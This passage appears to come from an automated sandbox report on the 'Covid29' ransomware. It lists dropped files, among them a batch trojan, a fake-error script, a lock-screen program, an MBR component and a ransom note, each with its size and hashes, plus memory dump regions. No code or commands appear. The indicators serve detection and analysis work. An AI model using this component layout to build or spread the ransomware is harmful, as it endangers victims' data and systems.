                                                  539a1bb09223a432eef2c98a2d000bf924346d2529ba26190f50d55a1bd80fb5699497e5bd46287c9af0e315a97f81211cb6087cac50c11785c8485585d05e53

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                  Filesize

                                                  11KB

                                                  MD5

                                                  9e9542ddec285b368f9d46601d42dec5

                                                  SHA1

                                                  360c46d5300f874be30878d63761683af7eb349e

                                                  SHA256

                                                  0094a1df22e0543d3f965ab565e5f1208e69428222f8c19557a1ae14db7ac10e

                                                  SHA512

                                                  898ca5fea067e904d3312cca5b3d56f32c834bd7f25342ab24de0a9236fef687cdfc12f1e4ce0a097aa8ace20a9c31308390be944be10cab18388d16d880dec4

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                  Filesize

                                                  10KB

                                                  MD5

                                                  b9b615ed1a6f8673850f647cb712811d

                                                  SHA1

                                                  5207cd26aaf411a1ace9b51594bc90b7bb7a2817

                                                  SHA256

                                                  8f98071fa59779e1cb6a978058b8174ddc6caa5136a9db1333f8a9f2f7364774

                                                  SHA512

                                                  c651486d48e16a17c65337ae69c06e492fa9ae5e64f7a666875fdba9d1bcf60fd68be05e2872d3cfcb69bbc15d470004d2a1fd60a1b5d4baca7f2210cf4c1ec3

                                                • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

                                                  Filesize

                                                  10KB

                                                  MD5

                                                  99d3ecd709464e38b25be3ab947ad5c9

                                                  SHA1

                                                  f3753394a5fef90f29dca347abd40adf15e9a47d

                                                  SHA256

                                                  c87c395c07643e24dfa5b59915b602dea53bf7c7fa7db991af59b84a122c91a3

                                                  SHA512

                                                  a694c3c842ea72e34d654998cc38a98ec5f3b53727a377789ab10ca49845e7dc1334c945bafc659a489f5c0cd65180c08b13d69d0780a2855c95a1978c58c991

                                                • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

                                                  Filesize

                                                  10KB

                                                  MD5

                                                  711f1a880c08e1f7867f1bdd117320b7

                                                  SHA1

                                                  50c2d0859f6fd41024d486e2ab537507b975991d

                                                  SHA256

                                                  f868e98aa21c341e365d73e301d87c006b557033d8d7b2808fed207734fe5143

                                                  SHA512

                                                  885c2abd9047727b33ea760836cbbe4eaf5fddc08375a8b37840c99332131f0f7164f87c0abeb4523f42262349ab12a1c22c12813a9d81d6955c7d20b41a9a0a

                                                • C:\Users\Admin\AppData\Local\Temp\F9E2.tmp\Cov29Cry.exe.death

                                                  Filesize

                                                  103KB

                                                  MD5

                                                  8bcd083e16af6c15e14520d5a0bd7e6a

                                                  SHA1

                                                  c4d2f35d1fdb295db887f31bbc9237ac9263d782

                                                  SHA256

                                                  b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a

                                                  SHA512

                                                  35999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a

                                                • C:\Users\Admin\AppData\Local\Temp\F9E2.tmp\Cov29LockScreen.exe

                                                  Filesize

                                                  48KB

                                                  MD5

                                                  f724c6da46dc54e6737db821f9b62d77

                                                  SHA1

                                                  e35d5587326c61f4d7abd75f2f0fc1251b961977

                                                  SHA256

                                                  6cde4a9f109ae5473703c4f5962f43024d71d2138cbd889223283e7b71e5911c

                                                  SHA512

                                                  6f83dd7821828771a9cae34881c611522f6b5a567f5832f9e4b9b4b59bf495f40ad78678bd86cba59d32ea8644b4aa5f052552774fea142b9d6da625b55b6afc

                                                • C:\Users\Admin\AppData\Local\Temp\F9E2.tmp\TrojanRansomCovid29.bat

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  57f0432c8e31d4ff4da7962db27ef4e8

                                                  SHA1

                                                  d5023b3123c0b7fae683588ac0480cd2731a0c5e

                                                  SHA256

                                                  b82e64e533789c639d8e193b78e06fc028ea227f55d7568865120be080179afc

                                                  SHA512

                                                  bc082486503a95f8e2ce7689d31423386a03054c5e8e20e61250ca7b7a701e98489f5932eba4837e05ec935057f18633798a10f6f84573a95fcf086ee7cabcbf

                                                • C:\Users\Admin\AppData\Local\Temp\F9E2.tmp\fakeerror.vbs

                                                  Filesize

                                                  144B

                                                  MD5

                                                  c0437fe3a53e181c5e904f2d13431718

                                                  SHA1

                                                  44f9547e7259a7fb4fe718e42e499371aa188ab6

                                                  SHA256

                                                  f2571f03eb9d5ee4dca29a8fec1317ded02973c5dd233d582f56cebe98544f22

                                                  SHA512

                                                  a6b488fc74dc69fc4227f92a06deb297d19cd54b0e07659f9c9a76ce15d1ef1d8fa4d607acdd03d30d3e2be2a0f59503e27fc95f03f3006e137fa2f92825e7e3

                                                • C:\Users\Admin\AppData\Local\Temp\F9E2.tmp\mbr.exe.danger

                                                  Filesize

                                                  1.3MB

                                                  MD5

                                                  35af6068d91ba1cc6ce21b461f242f94

                                                  SHA1

                                                  cb054789ff03aa1617a6f5741ad53e4598184ffa

                                                  SHA256

                                                  9ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e

                                                  SHA512

                                                  136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169

                                                • C:\Users\Admin\Desktop\covid29-is-here.txt

                                                  Filesize

                                                  861B

                                                  MD5

                                                  c53dee51c26d1d759667c25918d3ed10

                                                  SHA1

                                                  da194c2de15b232811ba9d43a46194d9729507f0

                                                  SHA256

                                                  dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52

                                                  SHA512

                                                  da41cef03f1b5f21a1fca2cfbf1b2b180c261a75d391be3a1ba36e8d4d4aefab8db024391bbee06b99de0cb0b8eb8c89f2a304c27e20c0af171b77db33b2d12c

                                                • C:\Users\Admin\Downloads\Covid29 Ransomware (1).zip:Zone.Identifier

                                                  Filesize

                                                  26B

                                                  MD5

                                                  fbccf14d504b7b2dbcb5a5bda75bd93b

                                                  SHA1

                                                  d59fc84cdd5217c6cf74785703655f78da6b582b

                                                  SHA256

                                                  eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

                                                  SHA512

                                                  aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

                                                • C:\Users\Admin\Downloads\Covid29 Ransomware.zip

                                                  Filesize

                                                  1.7MB

                                                  MD5

                                                  272d3e458250acd2ea839eb24b427ce5

                                                  SHA1

                                                  fae7194da5c969f2d8220ed9250aa1de7bf56609

                                                  SHA256

                                                  bbb5c6b4f85c81a323d11d34629776e99ca40e983c5ce0d0a3d540addb1c2fe3

                                                  SHA512

                                                  d05bb280775515b6eedf717f88d63ed11edbaae01321ec593ecc0725b348e9a0caacf7ebcd2c25a6e0dc79b2cdae127df5aa380b48480332a6f5cd2b32d4e55c

                                                • C:\Users\Admin\Downloads\Covid29 Ransomware.zip:Zone.Identifier

                                                  Filesize

                                                  55B

                                                  MD5

                                                  0f98a5550abe0fb880568b1480c96a1c

                                                  SHA1

                                                  d2ce9f7057b201d31f79f3aee2225d89f36be07d

                                                  SHA256

                                                  2dfb5f4b33e4cf8237b732c02b1f2b1192ffe4b83114bcf821f489bbf48c6aa1

                                                  SHA512

                                                  dbc1150d831950684ab37407defac0177b7583da0fe13ee8f8eeb65e8b05d23b357722246888189b4681b97507a4262ece96a1c458c4427a9a41d8ea8d11a2f6

                                                • memory/1304-573-0x0000000000080000-0x00000000000A0000-memory.dmp

                                                  Filesize

                                                  128KB

                                                • memory/1420-575-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                  Filesize

                                                  864KB

                                                • memory/5116-542-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                  Filesize

                                                  1.8MB

                                                • memory/5116-649-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                  Filesize

                                                  1.8MB

                                                • memory/5116-656-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                  Filesize

                                                  1.8MB